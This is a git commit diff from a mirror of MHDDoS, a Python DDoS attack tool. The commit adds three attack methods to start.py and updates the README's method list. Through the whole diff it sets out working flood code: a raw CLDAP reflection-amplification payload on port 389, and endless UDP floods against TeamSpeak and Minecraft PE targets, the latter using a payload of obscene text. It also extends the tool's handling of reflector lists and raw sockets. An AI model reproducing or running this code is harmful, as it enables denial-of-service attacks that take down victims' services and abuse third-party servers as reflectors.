mirror of
https://github.com/MatrixTM/MHDDoS.git
synced 2024-11-16 03:32:32 +08:00
Added 3 method
* CLDAP * MCPE (Minecraft PE, Geyser (Java)) * FIVEM
This commit is contained in:
parent
fcd19b3cee
commit
2cd27e8b64
|
@ -1,6 +1,6 @@
|
|||
<p align="center"><img src="https://cdn.discordapp.com/attachments/938175699326484490/948263435412598864/unknown_2.png" width="400px" height="150px" alt="aventium softworks"></p>
|
||||
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 47 Methods</h1>
|
||||
<h1 align="center">MHDDoS - DDoS Attack Script With 50 Methods</h1>
|
||||
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
|
||||
|
||||
<p align="center">
|
||||
|
@ -49,14 +49,15 @@
|
|||
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
|
||||
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="cps"> CONNECTION | Open connection alive with proxy
|
||||
* <img src="https://ia803109.us.archive.org/27/items/source-engine-video-projects/source-engine-video-projects_itemimage.png" width="16" height="16" alt="vse"> VSE | Send Source Engine Protocol
|
||||
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="vse"> FIVEM | Send Fivem Status Ping Protocol
|
||||
* <img src="https://ia803109.us.archive.org/27/items/source-engine-video-projects/source-engine-video-projects_itemimage.png" width="16" height="16" alt="vse"> VSE | Send Valve Source Engine Protocol
|
||||
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send Fivem Status Ping Protocol
|
||||
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
|
||||
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack
|
||||
* <img src="https://cdn.icon-icons.com/icons2/2699/PNG/512/minecraft_logo_icon_168974.png" width="16" height="16" alt="minecraft"> MINECRAFT | Minecraft Status Ping Protocol
|
||||
* <img src="https://cdn-icons-png.flaticon.com/512/2653/2653461.png" width="16" height="16" alt="dns"> DNS | DNS Amplification
|
||||
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="chargen"> CHAR | Chargen Amplification
|
||||
* <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRct5OvjSCpUftyRMm3evgdPOa-f8LbwJFO-A&usqp=CAU" width="16" height="16" alt="cldap"> CLDAP | Cldap Amplification
|
||||
* <img src="https://help.apple.com/assets/6171BD2C588E52621824409D/6171BD2D588E5262182440A4/en_US/8b631353e070420f47530bf95f1a7fae.png" width="16" height="16" alt="ard"> ARD | Apple Remote Desktop Amplification
|
||||
* <img src="https://www.tenforums.com/geek/gars/images/2/types/thumb__emote__esktop__onnection.png" width="16" height="16" alt="rdp"> RDP | Remote Desktop Protocol Amplification
|
||||
|
||||
|
|
39
start.py
39
start.py
|
@ -84,7 +84,8 @@ class Methods:
|
|||
|
||||
LAYER4_METHODS: Set[str] = {
|
||||
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
|
||||
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM"
|
||||
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
|
||||
"CLDAP"
|
||||
}
|
||||
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
|
||||
|
||||
|
@ -291,6 +292,8 @@ class Layer4(Thread):
|
|||
if name == "UDP": self.SENT_FLOOD = self.UDP
|
||||
if name == "SYN": self.SENT_FLOOD = self.SYN
|
||||
if name == "VSE": self.SENT_FLOOD = self.VSE
|
||||
if name == "TS3": self.SENT_FLOOD = self.TS3
|
||||
if name == "MCPE": self.SENT_FLOOD = self.MCPE
|
||||
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
|
||||
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
|
||||
if name == "CPS": self.SENT_FLOOD = self.CPS
|
||||
|
@ -302,6 +305,11 @@ class Layer4(Thread):
|
|||
3389)
|
||||
self.SENT_FLOOD = self.AMP
|
||||
self._amp_payloads = cycle(self._generate_amp())
|
||||
if name == "CLDAP":
|
||||
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
|
||||
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
|
||||
self.SENT_FLOOD = self.AMP
|
||||
self._amp_payloads = cycle(self._generate_amp())
|
||||
if name == "MEM":
|
||||
self._amp_payload = (
|
||||
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
|
||||
|
@ -426,6 +434,25 @@ class Layer4(Thread):
|
|||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def TS3(self) -> None:
|
||||
global BYTES_SEND, REQUESTS_SENT
|
||||
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
|
||||
with socket(AF_INET, SOCK_DGRAM) as s:
|
||||
while Tools.sendto(s, payload, self._target):
|
||||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def MCPE(self) -> None:
|
||||
global BYTES_SEND, REQUESTS_SENT
|
||||
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
|
||||
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
|
||||
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
|
||||
b'\x73')
|
||||
with socket(AF_INET, SOCK_DGRAM) as s:
|
||||
while Tools.sendto(s, payload, self._target):
|
||||
continue
|
||||
Tools.safe_close(s)
|
||||
|
||||
def _genrate_syn(self) -> bytes:
|
||||
ip: IP = IP()
|
||||
ip.set_ip_src(getMyIPAddress())
|
||||
|
@ -768,9 +795,9 @@ class HttpFlood(Thread):
|
|||
|
||||
def DYN(self):
|
||||
payload: str | bytes = str.encode(self._payload +
|
||||
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
|
||||
self.randHeadercontent +
|
||||
self.SpoofIP +"\r\n")
|
||||
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
|
||||
self.randHeadercontent +
|
||||
self.SpoofIP + "\r\n")
|
||||
s = None
|
||||
with suppress(Exception), self.open_connection() as s:
|
||||
for _ in range(self._rpc):
|
||||
|
@ -1355,7 +1382,7 @@ if __name__ == '__main__':
|
|||
if port > 65535 or port < 1:
|
||||
exit("Invalid Port [Min: 1 / Max: 65535] ")
|
||||
|
||||
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD", "SYN"} and \
|
||||
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
|
||||
not ToolsConsole.checkRawSocket():
|
||||
exit("Cannot Create Raw Socket")
|
||||
|
||||
|
@ -1371,7 +1398,7 @@ if __name__ == '__main__':
|
|||
argfive = argv[5].strip()
|
||||
if argfive:
|
||||
refl_li = Path(__dir__ / "files" / argfive)
|
||||
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD"}:
|
||||
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
|
||||
if not refl_li.exists():
|
||||
exit("The reflector file doesn't exist")
|
||||
if len(argv) == 7:
|
||||
|
|
Loading…
Reference in New Issue
Block a user